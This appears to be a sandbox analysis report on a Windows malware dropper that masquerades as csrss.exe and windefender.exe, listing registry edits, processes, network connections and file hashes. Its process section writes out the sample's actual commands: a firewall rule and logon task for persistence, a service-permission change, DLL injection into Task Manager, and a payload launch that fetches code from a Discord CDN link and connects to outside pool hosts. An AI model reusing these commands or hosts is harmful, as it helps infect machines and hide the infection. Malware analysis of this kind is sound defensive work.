| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2412 = "Marquesas Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0943b7d5-b591-4eee-a503-917b095aaeee.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.6.0.0.0.0.0.0.0.1.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | server4.localstats.org | udp |
| US | 8.8.8.8:53 | stun.stunprotocol.org | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | stun.sipgate.net | udp |
| US | 15.197.250.192:3478 | stun.sipgate.net | udp |
| US | 8.8.8.8:53 | 192.250.197.15.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:3478 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:31465 | | tcp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.27.3.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| US | 8.8.8.8:53 | 25.4.79.80.in-addr.arpa | udp |
| US | 199.59.243.225:80 | | tcp |
| NL | 80.79.4.25:80 | | tcp |
| N/A | 10.127.2.71:445 | tcp | |
| N/A | 10.127.2.76:445 | tcp | |
| N/A | 10.127.2.112:445 | tcp | |
| N/A | 10.127.2.117:445 | tcp | |
| N/A | 10.127.2.75:445 | tcp | |
| N/A | 10.127.2.91:445 | tcp | |
| N/A | 10.127.2.127:445 | tcp | |
| N/A | 10.127.2.79:445 | tcp | |
| N/A | 10.127.2.122:445 | tcp | |
| N/A | 10.127.2.109:445 | tcp | |
| N/A | 10.127.2.68:445 | tcp | |
| N/A | 10.127.2.74:445 | tcp | |
| N/A | 10.127.2.65:445 | tcp | |
| N/A | 10.127.2.126:445 | tcp | |
| N/A | 10.127.2.67:445 | tcp | |
| N/A | 10.127.2.95:445 | tcp | |
| N/A | 10.127.2.93:445 | tcp | |
| N/A | 10.127.2.100:445 | tcp | |
| N/A | 10.127.2.116:445 | tcp | |
| N/A | 10.127.2.135:445 | tcp | |
| N/A | 10.127.2.139:445 | tcp | |
| N/A | 10.127.2.163:445 | tcp | |
| N/A | 10.127.2.174:445 | tcp | |
| N/A | 10.127.2.140:445 | tcp | |
| N/A | 10.127.2.144:445 | tcp | |
| N/A | 10.127.2.149:445 | tcp | |
| N/A | 10.127.2.155:445 | tcp | |
| N/A | 10.127.2.133:445 | tcp | |
| N/A | 10.127.2.131:445 | tcp | |
| N/A | 10.127.2.154:445 | tcp | |
| N/A | 10.127.2.141:445 | tcp | |
| N/A | 10.127.2.132:445 | tcp | |
| N/A | 10.127.2.151:445 | tcp | |
| N/A | 10.127.2.130:445 | tcp | |
| N/A | 10.127.2.176:445 | tcp | |
| N/A | 10.127.2.190:445 | tcp | |
| N/A | 10.127.2.147:445 | tcp | |
| N/A | 10.127.2.158:445 | tcp | |
| N/A | 10.127.2.145:445 | tcp | |
| N/A | 10.127.2.148:445 | tcp | |
| N/A | 10.127.2.175:445 | tcp | |
| N/A | 10.127.2.179:445 | tcp | |
| N/A | 10.127.2.168:445 | tcp | |
| N/A | 10.127.2.129:445 | tcp | |
| N/A | 10.127.2.173:445 | tcp | |
| N/A | 10.127.2.181:445 | tcp | |
| N/A | 10.127.2.138:445 | tcp | |
| N/A | 10.127.2.166:445 | tcp | |
| N/A | 10.127.2.170:445 | tcp | |
| N/A | 10.127.2.157:445 | tcp | |
| N/A | 10.127.2.188:445 | tcp | |
| N/A | 10.127.2.187:445 | tcp | |
| N/A | 10.127.2.184:445 | tcp | |
| N/A | 10.127.2.143:445 | tcp | |
| N/A | 10.127.2.150:445 | tcp | |
| N/A | 10.127.2.177:445 | tcp | |
| N/A | 10.127.2.178:445 | tcp | |
| N/A | 10.127.2.136:445 | tcp | |
| N/A | 10.127.2.192:445 | tcp | |
| N/A | 10.127.2.134:445 | tcp | |
| N/A | 10.127.2.137:445 | tcp | |
| N/A | 10.127.2.161:445 | tcp | |
| N/A | 10.127.2.182:445 | tcp | |
| N/A | 10.127.2.164:445 | tcp | |
| N/A | 10.127.2.172:445 | tcp | |
| N/A | 10.127.2.189:445 | tcp | |
| N/A | 10.127.2.191:445 | tcp | |
| N/A | 10.127.2.165:445 | tcp | |
| N/A | 10.127.2.186:445 | tcp | |
| N/A | 10.127.2.153:445 | tcp | |
| N/A | 10.127.2.152:445 | tcp | |
| N/A | 10.127.2.156:445 | tcp | |
| N/A | 10.127.2.162:445 | tcp | |
| N/A | 10.127.2.171:445 | tcp | |
| N/A | 10.127.2.160:445 | tcp | |
| N/A | 10.127.2.167:445 | tcp | |
| N/A | 10.127.2.183:445 | tcp | |
| N/A | 10.127.2.159:445 | tcp | |
| N/A | 10.127.2.169:445 | tcp | |
| N/A | 10.127.2.185:445 | tcp | |
| N/A | 10.127.2.146:445 | tcp | |
| N/A | 10.127.2.180:445 | tcp | |
| N/A | 10.127.2.142:445 | tcp | |
| NL | 80.79.4.25:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 162.159.135.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 46.8.8.100:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 81.3.27.44:3478 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 127.0.0.1:31465 | tcp | |
| BG | 185.82.216.111:443 | server4.localstats.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j1fzz3vj.0jl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 2314356a53fc3568e2c7bcc48d72e7f5 |
| SHA1 | 2ca64b14d679e44b7aa735fa47cb819aa170440e |
| SHA256 | b644f359d221708fc41b9284f0428a60cd9dcd092d5421cbde86631863740ab5 |
| SHA512 | eb9821ad89049baa01119f556ea5342fc53201dec1d4a9b4634f8cb5aa7c0464957d4a03c13cd15ddba6a1aa0865863e4d6de27ec1348db6ffa198adbd2a9d59 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 033c90ec47349809ca5e2e821c45b7ad |
| SHA1 | 1170e5899ae8875d465fd917e55f478b6de4ca25 |
| SHA256 | 43dd3bbe696f506f3dd99cdbc24844aeb63055b638f9cfa117f786753ac205f4 |
| SHA512 | 66c7130f1db9a46a4a2232c1ad701deaa521988798709fbf7a87e53388e62ede4543a10689314805fba1ec9dcf0a4a03523376bd95e1eb6d60eadd8ffdcaa557 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | ac1c7c829a7aae585a842cc52304d4ab |
| SHA1 | 29cd1aca091d849005291077097d623f26470ca4 |
| SHA256 | 79ea61a9a8292df897fafba8d322ddacff50f7cfb825cdc14a09e9f8b0231a57 |
| SHA512 | 85e56462249a2e95a144d9cbb65ddd9d4fe9581c96a85c55be003065ce8031d42f509d2b833b5a4e3dd38ca3d31e452d82fa99e82851382b39250375c0360784 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | f9605bd97168b203cbe6452d95a1ac01 |
| SHA1 | cac7282673f4fda99716165f9ba49e3969a4ab1e |
| SHA256 | 72915da1c649f3bed3592bcd89b4efd1730abd1870fa811294bc0dfeaee6421f |
| SHA512 | 492fd9d403b16e3b5ce84d0a9e0053fd2d00768bb44e02897dbd7de0984262bd0f26d05cc54603a786863d6d82b1ea37d83776918b1f7e77a545887d5e7d26a9 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 386825596b87a87554d2938a5d510f22 |
| SHA1 | ae2e0625827742e411c028ba41130e8662c8fd77 |
| SHA256 | 84cee255f5d87960c14b8438b4d59e8535e23cf74c213f4974ebc235f6c37fbf |
| SHA512 | 788ad6e2da55ac249aa1425658b1ff689cc854bc70179b3e45be2ff0590c6117d67771e0ca51e7ca1e822d444070ba20fe28bab32d0e1f4b7cb3dd5b9a5037ab |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 68316061ede6575bd4243893bac60f8a |
| SHA1 | f82424abf4a8d25144f239d13569ee5a418dbf0d |
| SHA256 | b3bd362e96d8f46fb600a63286adbd9338621378c7696674281495340b49abb3 |
| SHA512 | a1f4c72c4a874349511b1af945e540eb454073ab5e0d53e50277053df0e09abe977046fd545486d017264c4e40c30c09b43994a1d7f705df6e0be5327b50d37b |
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
| MD5 | dcb505dc2b9d8aac05f4ca0727f5eadb |
| SHA1 | 4f633edb62de05f3d7c241c8bc19c1e0be7ced75 |
| SHA256 | 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551 |
| SHA512 | 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | a6e3fc276537ee4ee60733b934dcbc78 |
| SHA1 | ecf9dd550a172441419a4cb87ed0c11162193288 |
| SHA256 | a35cd986f8073cf16ccd07808e98c34efc0e8c7fd1f24e807a9629c8ed7a9692 |
| SHA512 | d8b5a4f6df58f266c158dd7cad5267441273c12a172343ea8d20e379a15cdf901f13183ae2f5d436725c93746d465fef40637aef6baa2f11419a6295ee530864 |
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
| MD5 | 713674d5e968cbe2102394be0b2bae6f |
| SHA1 | 90ac9bd8e61b2815feb3599494883526665cb81e |
| SHA256 | f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057 |
| SHA512 | e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 55f97c3bd3f689d5eccd8dfe68e9fbff |
| SHA1 | a54f6e02d98a29bc450c307466883ae6bcaa5b05 |
| SHA256 | 7dcd36bbc48df61431a7578db628701f3974a3dbef26c40444096e758ca83349 |
| SHA512 | d1c49dbb2513a136d93749d6dc8e800971dc16aeee44a554f4f7645d1a11a70b1d503a606a92ba3ce69e18b5f8b35c870e422c37b8c0bb5071e43a2e1a31a098 |
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
| MD5 | 1bf850b4d9587c1017a75a47680584c4 |
| SHA1 | 75cd4738ffc07f203c3f3356bc946fdd0bcdbe19 |
